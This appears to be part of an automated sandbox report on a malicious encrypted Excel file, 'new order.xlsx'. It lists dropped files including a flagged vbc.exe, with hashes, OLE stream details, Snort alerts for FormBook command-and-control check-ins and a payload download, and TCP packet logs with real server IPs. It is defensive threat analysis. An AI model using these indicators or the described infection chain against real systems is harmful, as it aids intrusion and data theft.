                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97389FAC.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F241D1B.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7608
                                                                                                                                                  Entropy (8bit):5.073078686684614
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+SO51L6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5KjU+H3tWa6WdTfOYLpR8d
                                                                                                                                                  MD5:38F8AEF1B9B013E0B0068166B63A0E43
                                                                                                                                                  SHA1:A4DCB11C764BF5B40EE117A372735B2AFA0B55F7
                                                                                                                                                  SHA-256:6668AA81E5E7F205C8CD14960B057A1E3FE04D9591DC11157B3A652CA12EC34E
                                                                                                                                                  SHA-512:C7B6120132E3A8D0AA8C730283E8E695D770D2E740B7535AFEDE9E94E47F9431F12FBCDDB6A3BEBEE90A89E3DA30F31FC375B95EA822157CA71FD6501250550D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................}.6.).X.......d...................D..........p....\...D.......D..........p....D....6Pv...p....`..p.%}.$y.v.t|.........h......v..|.$.......d............^.p.....^.p.t|..t|........-........<.v................<.>v.Z.v....X..o.....%}........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D44E50E1.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D54AA3BD.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E22CC16E.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\Desktop\~$new order.xlsx
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):721408
                                                                                                                                                  Entropy (8bit):7.749166309747153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:8xQ/7SxjdzTy44OiFTH/xar1sFrnRQPjiN4/3fhAjxDRHEiloRyp:8xQmfy44jtxxFtUjq4/pMxDJ
                                                                                                                                                  MD5:750919BD7E02E7821EFA1B1BD0ED4EDA
                                                                                                                                                  SHA1:2D925D1D04D12C72E4411D84B2C2B297D09F2C3C
                                                                                                                                                  SHA-256:994F99037072FBEA77A376832818FEC2BDAF577A09B1936A7285E38ACE5D8E4F
                                                                                                                                                  SHA-512:087D25C798E2429B34B408FF0A315018A46FEB833D5286AB87835B5B2E49FD7B3079FACF5BE7CE44EC5E5869F2390AB50066DFDAAAE7F638C0F9D427B919162F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..`..............P.................. ... ....@.. .......................`............@.................................<...O.... ..X....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc.......@......................@..B................p.......H.......X....&...........................................................O.z....T....N..~/...-...u..JF.y?..E\.!.<._...|.dI..6.....\..<...j.......9....#`..U.E.....b........u..p...F.+..lq..).E=m....2...m.'.8/.dk.......Y.J.f..l...h.N.v.9B.*.........5%.kOUAK.......^...c0V...0.D.......................S........k1..c_.'T..zi:.....B..r.*v.c.N.r.P..o...{....(...M.3..0|.k.}4..Ki..#.y.+T1U..~....../......{..Z..!l'.>.E.EzL..Q.=7....X.P.qft.....1.%>....^..[c(.....)..s.0...

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                                                  Entropy (8bit):7.994753169045867
                                                                                                                                                  TrID:
                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                  File name:new order.xlsx
                                                                                                                                                  File size:1333760
                                                                                                                                                  MD5:d59accd992813d35bb00a4b3f84c4ffe
                                                                                                                                                  SHA1:851d437a71d1a156e0adb9f553611865b8c90d94
                                                                                                                                                  SHA256:002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
                                                                                                                                                  SHA512:7328ce416225e682b4b3f2c5c81427195144f3b030264d4a6dde967092b26165769bb87718843db8de6d56a6d1da3c8a2eb929f73b1c9720db3ca17a5fefad14
                                                                                                                                                  SSDEEP:24576:beO5efoW4hdgaEwAq4P1opC4O64Qgawpf0kkwgAEfH75:hFW4sasq4PONP4QoN7za75
                                                                                                                                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OLE
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "new order.xlsx"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:False
                                                                                                                                                  Application Name:unknown
                                                                                                                                                  Encrypted Document:True
                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                  Streams

                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:64
                                                                                                                                                  Entropy:2.73637206947
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:112
                                                                                                                                                  Entropy:2.7597816111
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:200
                                                                                                                                                  Entropy:3.13335930328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                  General
                                                                                                                                                  Stream Path:\x6DataSpaces/Version
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:76
                                                                                                                                                  Entropy:2.79079600998
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1318984
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptedPackage
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:1318984
                                                                                                                                                  Entropy:7.99890686533
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:4 . . . . . . . } . H . . . Y . . i . K . . ) _ . . . . . . . . ] . V M . . . . Y . . } . 4 v . _ . . ; . : c . # . ( . . _ e . . } . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z c . . . . . . . . x . = . . . Z
                                                                                                                                                  Data Raw:34 20 14 00 00 00 00 00 fd 7d 8b 48 d2 b1 ca 59 15 f6 69 e8 4b e4 f2 29 5f f5 d4 f6 b7 19 e9 c6 17 5d 01 56 4d 19 01 8c ef 59 d0 8a 7d c9 34 76 9d 5f 06 e1 3b b9 3a 63 f2 23 19 28 98 1e 5f 65 a4 a9 7d ea 91 8a ad 8c c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a 63 91 91 0b c6 a7 18 89 c2 78 ca 3d c2 fa 96 5a
                                                                                                                                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                  General
                                                                                                                                                  Stream Path:EncryptionInfo
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:224
                                                                                                                                                  Entropy:4.52655354693
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . H . . . . . . = . . F . . 2 _ . t * . . . @ v % . ' . { h 7 . . . . . . # . s . . q . . . . c X . Y . . o . 7 V . . . . . n P s . 4 e
                                                                                                                                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  07/22/21-17:11:01.858671TCP2019696ET TROJAN Possible MalDoc Payload Download Nov 11 20144916780192.168.2.22103.155.80.130
                                                                                                                                                  07/22/21-17:12:26.881021TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                                                                                                                  07/22/21-17:12:26.881021TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                                                                                                                  07/22/21-17:12:26.881021TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2234.102.136.180
                                                                                                                                                  07/22/21-17:12:27.021442TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:11:01.531136990 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:01.857800007 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:01.857975960 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:01.858670950 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.188283920 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188322067 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188349009 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188378096 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.188388109 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.188409090 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.188417912 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.514086962 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.515700102 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.515753031 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.515809059 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.517229080 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.517246008 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.517287970 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.518718004 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518737078 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518740892 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518743038 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518745899 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518748999 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518750906 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.518814087 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.520396948 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848548889 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848587990 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848612070 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848634958 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848655939 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848656893 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848670959 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848679066 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848697901 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848702908 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848725080 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848745108 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848746061 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848769903 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848781109 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848793983 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848802090 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848817110 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848829985 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848839998 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848850965 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848861933 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848872900 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848885059 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848897934 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848906994 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848917007 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848932981 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:02.848948002 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.848962069 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:02.850099087 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.175318956 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.175352097 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.175575972 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.176084995 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.176114082 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.176132917 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.176150084 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.176167011 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.176183939 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.176186085 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.176213026 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.176246881 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177136898 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177164078 CEST8049167103.155.80.130192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:11:03.177222013 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177268028 CEST4916780192.168.2.22103.155.80.130
                                                                                                                                                  Jul 22, 2021 17:11:03.177709103 CEST8049167103.155.80.130192.168.2.22
